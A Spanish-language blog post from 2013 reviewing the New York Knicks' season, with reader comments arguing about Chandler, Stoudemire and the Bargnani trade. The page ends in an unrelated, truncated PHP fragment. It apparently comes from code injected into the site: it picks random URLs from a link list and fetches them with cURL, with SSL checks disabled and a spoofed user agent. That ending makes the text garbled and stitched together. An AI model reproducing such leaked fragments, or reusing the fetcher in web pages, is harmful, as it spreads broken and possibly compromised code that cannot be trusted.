New York Knicks: Bien

01 de July de 2013 por HisRoyalAirness

Es posible que haya algún seguidor Knickerbocker satisfecho por la temporada de su equipo. Algunos incluso apuntarán que hace 3 años ni siquiera llegaban a los Playoffs. Otros se conformarán con el título de campeones de la Atlantic Division, que hacía una década que no se quedaba en la Gran Manzana. Los más optimistas se tomarán el premio de Mejor Sexto Hombre de JR Smith y el de mejor anotador del campeonato de Carmelo como una gesta que compensa este año. Pero el hecho es que una de las franquicias más ricas y con más seguidores de la liga y del planeta ha vuelto a caer en Playoffs, sea en la ronda que sea, debido a la falta de recursos ofensivos y a una inoperancia defensiva considerable. El juego fluido y dinámico mostrado en regular season se convirtió en postemporada en humo, munición de fogueo inútil e inofensiva cuando el juego se convierte en algo serio y los fundamentos y la seriedad realmente marcan la diferencia.

¿Tiene culpa y responsabilidad Carmelo? Rotundamente SÍ, pero por su contrato y su status en la liga. Se te paga para cerrar y ser decisivo y por muchos 39 puntos que anotes si en el último cuarto tiras 2 de 7 no estás haciendo ganar a tu equipo. Pero, hablando claro, se le está pidiendo que gane SOLO; eso no lo han hecho ni Hall of Fammers o Dream Teamers como David Robinson, Charles Barkley o Pat Ewing. Otros, ni siquiera entre dos, como la dupla Stockton-Malone. Eso sin mencionar a su némesis, rival, amigo y archicomparado Lebron James, que tuvo que buscar compañía fuera de Ohio. ¿Quién le ha ayudado de forma consistente en la anotación, al margen de JR Smith que se acabó disolviendo como un azucarillo? ¿Quién provoca dobles marcajes que eviten que las defensas se cierren sobre él? ¿Qué garantías hay en defensa y rebote si Melo se vacía en ataque y no puede colaborar lo suficiente? NADIE. 

La serie de los Pacers sirve para reflejar las dudas de muchos sobre el sustento de estos Knicks: Carmelo y el tiro en suspensión, sea de 2 o de 3. No ha habido más armas. Y como se dice en los mentideros periodísticos estadounidenses: “you live by the jumper, you die by the jumper”. Porque cuando los tiros no entran (y a veces no quieren entrar) te quedas sin nada. Los únicos recursos eran los aclarados o la apertura a la línea de tres. Las rotaciones, la definición de roles y el rebote han sido expedientes X. Las sustituciones de Felton cuando se le ha visto enchufado o la ausencias de tiros para éste y Shumpert en los últimos cuartos, han sido algunas de las decisiones polémicas que no hacen más que dar la razón a aquellos que dicen que Woodson se desinfla ante la presión. La veteranía de una plantilla que ha llegado muy justa a la post-temporada (los que han llegado), ha sido el tiro de gracia.

Aunque parezcan afirmaciones muy duras y rotundas aclaro que la de los Knicks no es una franquicia cualquiera y, desde luego, su proyecto no está planteado a medio plazo. Es un ganar ahora, nada de “largoplacísmo” ni encontrar la química. Hablamos de New York, la gente se parte la boca por jugar y vivir allí, las posibilidades para un jugador en honorarios por derechos de imagen y posibilidades de mercado se multiplican por 10 y la historia reciente demuestra que no han tenido problema alguno en dilapidar el dinero para perder. Pues que lo hagan para ganar.

PREMIOS

MVP: Carmelo Anthony, sin lugar a dudas. Líder de anotación en la temporada regular y brazo ejecutor de este equipo. Carga él solito con la Gran Manzana sobre sus hombros. Respect.

Rookie: Increíble. Nadie daba un duro por Pablo Prigioni en octubre y poco a poco el veterano fue abriéndose hueco y ganándose la confianza de sus compañeros y entrenador. Por momentos llevó la batuta del equipo con gran solvencia.

Sorpresa: La regular season de JR Smith y su título de Sexto Hombre, empañados por unos playoffs para olvidar. Destacar también la solvencia de Chris Copeland, pese a estar infrautilizado en los playoffs.

Decepción: ¿alguien lo adivina? Amaré Stoudamire. Sea por lesiones, provocadas o no, no vale lo que se le paga. Ni la mitad. Ni un cuarto.

Esfuerzo en vano: Siempre Carmelo. Puede fallar tiros, puede acaparar bola y no pasar al compañero libre pero siempre da la cara. El líder para bien y para mal de este equipo. Necesita ayuda.

JUGANDO A GM

Muchos hablaban de la mejora en la plantilla en general y la segunda unidad en particular a principios de temporada, aunque otros avisában(mos) de lo contrario.

La fama ganada por Tyson Chandler de excelso defensor es poco menos que una broma y, juntándolo con Stoudamire, podemos darnos cuenta de que una pintura con una capacidad de rebote muy limitada (en playoffs los dos cogen sus 10 rebotitos por noche) y una anotación sólo sustentada por Amaré, va a cobrar el año que viene 35 millones de dólares. Han leído bien. 35 millones y 3 años más de contrato cada uno.

Se dice que Stat es imposible de traspasar debido a su contrato. ¿Imposible? Regálalo. Habla con cualquier equipo de lotería e intercámbialo por jugadores de rotación o segundas rondas pero sácalo del vestuario. O haz un paquete con un lacito con ambos pívots y un par de cheerleaders y consigue al menos un jugador que valga la pena, aunque venga acompañado de basura. Son dos lastres, las cosas claras. La actitud y las arengas no meten canastas y por eso creo que el futuro ideal de este equipo pasa por prescindir de ambos jugadores. Yo no atisbo solución alternativa. Hay equipos con la cláusula de amnistía aún disponible que podrán aceptarlo a cambio de rondas o jugadores válidos. Ya que va a pagarse impuesto de lujo que se pague por algo que valga la pena y que acerque un poco más el anillo. ¿Josh Smith?¿CP3?¿Dwight Howard? ¿Andrew Bynum? La lista es muy amplia y puede encontrarse la fórmula, cosas peores se han visto.

¿Activos valiosos y de futuro? Carmelo por supuesto, Felton si se mantiene en forma y Shumpert, que si pule su tiro exterior y unido a su excelencia defensiva, puede convertirse en un jugadorazo.

El futuro de la franquicia está supeditado a que alguien acompañe a Melo en el parquet. Necesita su Wade o su Westbrook particular. Cuando lo tenga las críticas y las odiosas comparaciones podrán ser más justas.

Comenta

20 comentarios a esta entrada

  1. txusma dice:
    #1

    El comentario sobre Tyson Chandler me parece injustísimo. Esta temporada ha promediado más de 10 puntos y 10 rebotes (¿cuantos jugadores llegan al doble-doble de promedio?) y ha sido All Star. Pero lo más injusto me parece evaluarlo por los últimos partidos en los que ha jugado totalmente lesionado. Creo q se perdió los últimos partidos de RS y forzó en Playoffs, donde se notó que no estaba al 100%. A lo mejor debería haber sido un Boozer de la vida y haberse quedado en casa para no quedar mal ante Hibbert.
    Ponerlo en el mismo paquete que Amare me parece demencial.
    Otra cosa es que empecemos a ver que a los 31 años, el físico (nunca ha sido un titán en este aspecto) empiece a pasarle factura y Chandler necesita del 100% de su físico para rendir en plenitud.

      Citar

  2. Vader dice:
    #2

    Bastante de acuerdo en todo pero yo sigo creyendo que efectivamente la plantilla de este año era mejor, mucho mejor, que la del año anterior…

    Stat se podria traspasar como bien dices usando rondas hacía un equipo que aún tenga la amnistía. El problema es que no tenemos rondas, primeras rondas, hasta 2017!!!

    Un apunte, Stat y Chandler (al igual que casi toda la plantilla) tienen dos años más de contrato no tres. Son 34-35 millones entre los dos en dos años. En 2015 estamos limpios de contratos, sólo Felton y creo que es option ese año. Así que el próximo verano, si este año la cosa no va bien, supongo que haremos bastantes traspasos usando los expirings que tendremos o bien para pillar rondas de draft o para conseguir nuevos jugadores.

    Saludos

    P.D: me reservo mi opinión sobre lo que haría para más adelante.

      Citar

  3. rojorob dice:
    #3

    Tranquilidad. En NY se sigue este blog y ya se han puesto a trabajar para solucionar el problema de la defensa interior y el rebote. Llega Bargnani.

      Citar

  4. Simon dice:
    #4

    Totalmente de acuerdo en el resumen. Con Chandler te has pasado un poco pero creo que en el fondo llevas razón, para mi está sobrevalorado.
    Lo de la amnistía oara poner un ejemplo de cómo funciona, el único equipo que podría amnistiar a Stoudemire es los Knicks. Si lo traspasan ya no es amnistiable asi que hay que quitarse esa idea en la cabeza.
    Me gusta la idea de juntar el paquetito, puede haber alguien que pique… pero lo veo muy complicado. Para mi lo mejor sería firmar a Ujiri como GM y que el se encargue de traspasar paquetitos y colarsela al resto de franquicias ( sobre todo NY ) 🙂 🙂 🙂 él seguro que encuentra un equipo al que encasquetarle el pack…

    rojorob:
    Tranquilidad. En NY se sigue este blog y ya se han puesto a trabajar para solucionar el problema de la defensa interior y el rebote. Llega Bargnani.

    Jajajajajajja buenísimo el comentario, me parto la caja cada vez que lo releo XD XD

      Citar

  5. HisRoyalAirness dice:
    #5

    Sí que me he pasado con Chandler, lo sé, pero yo no concibo que un tio que cobra lo que cobra no tenga ni un solo movimiento para anotar con garantías. Lo siento pero lo veo así

      Citar

  6. Vader dice:
    #6

    Jejeje como siempre muchas risas a costa de los Knicks en el blog. En el fondo os lo ponemos fácil porque somos el pupas oficial de la NBA pero de momento este año hemos hecho mejor temporada que Denver ¿Los grandes ganadores con el traspaso de Melo? y veremos que hacen los Raptors del super-ujiri… Si, si Bargiani es muy malo y no defiende… aún no han visto a Novak… y entre Novak y Camby (que no jugará, al tiempo…) van a cobrar 3 millones menos que el contrato de Bargiani.

    Po favor, ya sabemos que los Knicks ahora mismo no estan para ganar de anillo pero por lo menos intentan mejorar el equipo con lo (poco) que tienen y aspiran a hacerlo mejor cada año. Seguramente será nadar para ahogarse en la orilla pero a mi me merecen mucho respeto los equipos que siempre intentan mejorar la plantilla año a año sin ir claramente a por los tops del draft.

    Personalmente creo que los Knicks no pueden empezar ya la recontrucción, eso sería volver a la inestabilidad de la época de I.Thomas.

    Saludos

      Citar

  7. txusma dice:
    #7

    HisRoyalAirness:
    Sí que me he pasado con Chandler, lo sé, pero yo no concibo que un tio que cobra lo que cobra no tenga ni un solo movimiento para anotar con garantías. Lo siento pero lo veo así

    Tiene 2 movimientos: coger rebote ofensivo y bajar el alley-oop!

      Citar

  8. Vader dice:
    #8

    Y tampoco es manco haciendo pick&roll…

      Citar

  9. Joe Johnson dice:
    #9

    Los Mavericks de Dallas tienen un titulo gracias a Tyson Chandler
    Los playoffs los jugó hecho polvo,injusto ponerlo a la altura de Stat
    De acuerdo en todo lo demas,felicidades x el blog 🙂

      Citar

  10. sempren dice:
    #10

    Vader:
    Jejeje como siempre muchas risas a costa de los Knicks en el blog. En el fondo os lo ponemos fácil porque somos el pupas oficial de la NBA pero de momento este año hemos hecho mejor temporada que Denver ¿Los grandes ganadores con el traspaso de Melo? y veremos que hacen los Raptors del super-ujiri… Si, si Bargiani es muy malo y no defiende… aún no han visto a Novak… y entre Novak y Camby (que no jugará, al tiempo…) van a cobrar 3 millones menos que el contrato de Bargiani.

    Po favor, ya sabemos que los Knicks ahora mismo no estan para ganar de anillo pero por lo menos intentan mejorar el equipo con lo (poco) que tienen y aspiran a hacerlo mejor cada año. Seguramente será nadar para ahogarse en la orilla pero a mi me merecen mucho respeto los equipos que siempre intentan mejorar la plantilla año a año sin ir claramente a por los tops del draft.

    Hombre, Denver tiene un proyecto de futuro, con Gallinari, Lawson, McGee, Faried o Chandler, todos con 25 años o así. ¿Ganadores? Hombre, ellos han hecho un gran traspaso, sacando mucho por un Anthony que se iba, eso está claro. ¿New York perdedores? Tampoco es eso, consiguieron la gran estrella que querían, y se están viendo resultados. El pero son las expectativas que se podían tener con la plantilla pre-traspaso, hay bastante gente que estaba ilusionada con el juego de los Felton, Gallo y Stat, y considera que fue un precio demasiado alto, empobrecieron la plantilla.

    En cuanto a lo de Bargnani, tengo sensaciones encontradas: por una parte el precio parece bajo en cuanto a un Novak que cada vez jugaba menos y un Camby que no llegó a entrar en el equipo, más unas rondas, por un buen jugador. Vamos, sumar sin apenas restar.
    Por otra parte, es un perfil de jugador que quizá no interesaba: poca defensa, poco rebote, otro 4 con posibilidad de anotación, sumado a Stat y Melo, quien estuvo muy cómodo toda la temporada en esa posición. Y cada vez menos rondas de draft en el equipo, así es difícil conseguir renovar poco a poco al equipo, porque aunque en el puesto 20 no se suelen encontrar estrellas, sí ciertos jugadores de rol como Fields o Shumpert que te pueden resolver la rotación, y aportar piernas jóvenes.

      Citar

  11. HisRoyalAirness dice:
    #11

    jajaja no me jodáis con los movimientos!

    Vamos a ver, sí que es un tío que hace un buen trabajo pero es que frente a pivots un poquito serios no se come nada!! Vale que jugó lesionado y que fue All-Star (lo cual demuestra lo lamentable que es la conferencia este) pero es que cobra casi 15 kilos y no sabe anotar. No lo pongo a la altura de Stat, para mí a esa altura sólo están los roedores urbanos, pero hay que dejarae de nombres y de números y ver que en Playoffs no vale sólo con no restar. Hay que sumar.
    Joder y en Dallas daba igual que no metiera una porque estaba con Dirk, Marion, Terry, Barea y compañía. Los Knicks no tienen nada.
    Y sí, está claro que la defensa en zona hizo que Dallas ganase el anillo pero…gracias a Chandler?? Al margen del solar que era la pintura de Miami (defender a Joel Anthony no es ninguna gesta) yo recuerdo a un rubio de 2’15 que creo que algo tuvo que ver en ese anillo.

      Citar

  12. Futurman dice:
    #12

    Los Knicks van a volver a jugar sin dos bases, Shumpert será 2, melo 3 y Bargnani se turnará con Stat para ver quien da menos lástima en el 4.

      Citar

  13. Jose Luis dice:
    #13

    Vamos a ver, respecto a Chandler.

    Chandler llegó lesionado a los PO, lo cual le mermó bastante, está claro. Pero lo más importante, no nos olvidemos, es que, igual que Ibaka es un gran defensor yendo a la ayuda y pésimo en un 1vs1, Chandler es un enorme defensor en zona y bastante malo en 1vs1. No hay más. En ataque solo vale para hundirla, y solo vale si alguien llega a la zona y da ese pase… ¿quien? No será Melo, ni Shumpert, ni el Kidd del año pasado… sólo Felton puede hacer eso, pidiendo un bloqueo a Amare y con Chandler bajo el aro, pero es que eso tampoco es jugada… puede salir 2-3 veces pero no más. Chandler da defensa zonal y ya está, ni siquiera es buen rebotero midiendo 2,16. Marion y Nowitzki eran los reboteros en ese equipo, y mira que Nowitzki no es buen rebotero tampoco.

    Lo de Bargnani me parece una broma, pero si va a cobrar menos… pues hasta me parece bien xD

      Citar

  14. HisRoyalAirness dice:
    #14

    Jose Luis:
    Vamos a ver, respecto a Chandler.

    Chandler llegó lesionado a los PO, lo cual le mermó bastante, está claro. Pero lo más importante, no nos olvidemos, es que, igual que Ibaka es un gran defensor yendo a la ayuda y pésimo en un 1vs1, Chandler es un enorme defensor en zona y bastante malo en 1vs1. No hay más. En ataque solo vale para hundirla, y solo vale si alguien llega a la zona y da ese pase… ¿quien? No será Melo, ni Shumpert, ni el Kidd del año pasado… sólo Felton puede hacer eso, pidiendo un bloqueo a Amare y con Chandler bajo el aro, pero es que eso tampoco es jugada… puede salir 2-3 veces pero no más. Chandler da defensa zonal y ya está, ni siquiera es buen rebotero midiendo 2,16. Marion y Nowitzki eran los reboteros en ese equipo, y mira que Nowitzki no es buen rebotero tampoco.

    Lo de Bargnani me parece una broma, pero si va a cobrar menos… pues hasta me parece bien xD

    De acuerdo en todo

      Citar

  15. Denise dice:
    #15

    Futurman: Los Knicks van a volver a jugar sin dos bases, Shumpert será 2, melo 3 y Bargnani se turnará con Stat para ver quien da menos lástima en el 4.

    Jajja, me parto con los comentarios negativos sobre Bargnani, pero en serio, creo que Bargnani va a callar bocas a sus haters..

      Citar

  16. melo15 dice:
    #16

    A mi Chandler me parece que hace bastante bien el trabajo por el cual le pagan, yo buscaria otros culpables como JR, Stat o Felton.
    Es verdad que en las Semifinales, Hibbert se comio a Chandler en todos los aspectos pero hay que recordar que ni Felton ni Smith estuvieron bien.

    A mi el fichaje de Bargnani me parece bueno, porque este año se ha notado mucho la falta de un anotador que acompañe a Melo, sobretodo en PO.
    De Stat siempre decimos lo mismo, con el al 50% los Knicks serian aspirantes a Finales de Conferencia pero al final siempre es lo mismo.

      Citar

  17. Viva_Dirk dice:
    #17

    Bueno, el tema de Bargnani es no engañarse con el. Hay que tener claras varias cosas:

    – Se ha perdido 80 partidos en las 2 últimas temporadas, y no es ninguna maravilla física como para tener una gran recuperación.

    – No podemos considerar a Bargnani un jugador interior casi en ningun sentido. Desde que llegó a la liga el 30% de sus tiros a canasta ha sido de 3, de hecho tira mas de 3 que tiros libres, y su promedio de rebotes es de 4.8. Sus porcentajes de tiro son de escolta, mas bien de escolta malo. Y eso que antes estaba mejor físicamente.

    Con eso, es verdad que es un tio que puede darle algo de anotación al equipo, pero desde luego no me parece una gran mejora.

      Citar

  18. nba dice:
    #18

    Ni me quiero imaginar lo que se dira cuando llegue Lakers…, yo con los Knicks siempre tengo la sensacion de “El dia de la marmota”, por A o por B , no consiguen sacar redito de la plantilla de la que disponen

      Citar

  19. lost dice:
    #19

    Carmelo si de algo tiene la culpa es que los Knicks acabasen en segunda ronda y luchando en el Game 6. Creo que el único al que no se le puede llamar culpable es a Carmelo, ha estado brutal y jugando con dolor.
    La decepción no creo que sea Stoudemire. Cuando uno tiene unas rodillas que son como el cristal no tiene la culpa. Yo lo seguí mucho en Phoenix y ya se le veía una fragilidad propensa a las lesiones que no es ninguna novedad. Creo que muchos dudabamos si jugaría los 82 partidos de la RS, cosa que tampoco ha hecho nadie del roster de NY,

    Las decepciones son para mí 2: Chandler, que ha hecho una buena RS pero tanto Celtics como Pacers se lo han comido, y el juego interior de Boston es bastante pobre. A un jugador de su nivel se le pide algo más, no ha sido el caso. La otra es JR Smith que después de una RS brutal siendo el mejor 6o hombre, ha vuelto a ser el JR de Denver que se escondía en los POs, dos series horrorosas.
    Felton, Prigioni y Copeland han sido las buenas sorpresas de la temporada, regulares y muy útiles para el small ball de NY.

    Lo malo ha sido la edad que no perdona: Sheed y Kurt Thomas se retiraron, Camby se ha pasado sin jugar toda la temporada prácticamente, Kidd llegó exhausto a los POs,… Este año ya sin Kidd, Camby, Thomas y Sheed y con Hardaway Jr, Leslie, Bargniani y algo de la FA van a llegar mejor, además Shumpert y Stoudemire empezarán la temporada con el equipo.

      Citar

  20. lost dice:
    #20

    Si consiguen renovar a JR Smith y firman un buen base suplente y un par de interiores por el mínimo, yo creo que llegan a ser 3-4 en el Este. Bargniani es un pedazo de fit para Melo. Sus problemas físicos se deben a que no se cuida, se ha cansado de perder en Toronto y eso le lleva a más lesiones. Carmelo en el poste, Andrea jugará practicamente de 3 y en defensa hará lo que pueda. Y si Stoudemire no se lesiona ojo. Creo que les puede quedar algo así:

    Felton/Telfair/Prigioni
    Shumpert/Smith/Hardaway
    Carmelo/Francisco Garcia/Leslie
    Bargnani/Stoudemire/Jeffries
    Chandler/Martin o Brand

    Con Carmelo jugando de 4 en ocasiones y Stoudemire de 5

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>